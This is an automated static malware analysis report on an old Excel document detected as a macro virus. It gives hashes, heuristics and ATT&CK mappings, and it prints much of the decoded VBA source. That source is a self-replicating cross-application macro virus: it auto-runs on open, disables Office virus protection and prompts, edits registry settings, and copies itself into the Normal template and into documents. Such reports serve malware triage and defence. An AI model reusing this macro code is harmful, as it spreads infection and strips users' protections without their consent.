Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2498e4836bcc7563…

MALICIOUS

Office (OLE)

52.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: bfca009fdd5bd6e6151882e6845d28b8 SHA-1: 8bed9da47ee007c328e662206e715d61d26facfa SHA-256: 2498e4836bcc7563607fe935fb7d4711b6ecede7d841a015a5f10db83dd4c9c9
460 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OLE document containing VBA macros, specifically triggering AutoOpen and CreateObject functions, which are commonly used to execute malicious code. ClamAV detection as 'Doc.Trojan.Exceller-1' further confirms its malicious nature. The presence of AutoOpen and CreateObject suggests the macro is designed to run automatically upon opening and likely downloads or executes a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Trojan.Exceller-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Exceller-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 28,484 bytes but its declared streams total only 0 bytes — 28,484 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7824 bytes
SHA-256: 2ab0b27e97ee112e512d61563a4aef4d37bfed669f544013e88092a7a8378c99
Detection
ClamAV: Doc.Trojan.Exceller-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Cross"
Rem Name:   Office97Macro.Crossworkx
Rem Author: jack twoflower LineZer0/Metaphase
Rem Date:   May 1999


Public Const ModulName = "Cross"

Public Declare Function SetCursorPos Lib "user32" _
    (ByVal x As Long, ByVal y As Long) As Long

Public Declare Function GetCursorPos Lib "user32" _
    (lpPoint As Maus) As Long

Public Declare Sub Sleep Lib "kernel32" _
    (ByVal dwMilliseconds As Long)

Private Type Maus
       Xpos As Long
       Ypos As Long
End Type

Sub AutoOpen()
On Error Resume Next

Options.VirusProtection = False
Options.SaveNormalPrompt = False

SetAttr NormalTemplate.FullName, vbNormal

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""

CommandBars("View").Controls(6).Enabled = False
CommandBars("Format").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(13).Enabled = False
CommandBars("Tools").Controls(14).Enabled = False

Application.DisplayAlerts = wdAlertsNone

Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"

Set Normal_ = NormalTemplate.VBProject.VBComponents
Set Active_ = ActiveDocument.VBProject.VBComponents

For i = 1 To Normal_.Count
    If Normal_(i).Name = ModulName Then NormalIns = True
Next i

For j = 1 To Active_.Count
    If Active_(j).Name = ModulName Then ActiveIns = True
Next j

If NormalIns = False Then
    Normal_.Import "c:\cross.sys"
End If

If ActiveIns = False Then
    Active_.Import "c:\cross.sys"
    ActiveDocument.SaveAs ActiveDocument.FullName
End If

With Application.FileSearch
    .LookIn = Application.Path
    .FileName = "Workbook_.xls"
    .SearchSubFolders = True
    .Execute
If .FoundFiles.Count <> 0 Then ExcelInstalled = True
End With
    
If ExcelInstalled = False Then

    Set excelx = CreateObject("excel.application")
    excelx.Visible = False
    
    excelx.CommandBars("Tools").Controls(10).Enabled = False
    excelx.CommandBars("Tools").Controls(12).Enabl
... (truncated)
embedded_office_off000060bc.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60BC 28484 bytes
SHA-256: 3a8b37d6bfb574e99531c5e07bb7f6c925d08d3efa71fda20777e90db52f8f96
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.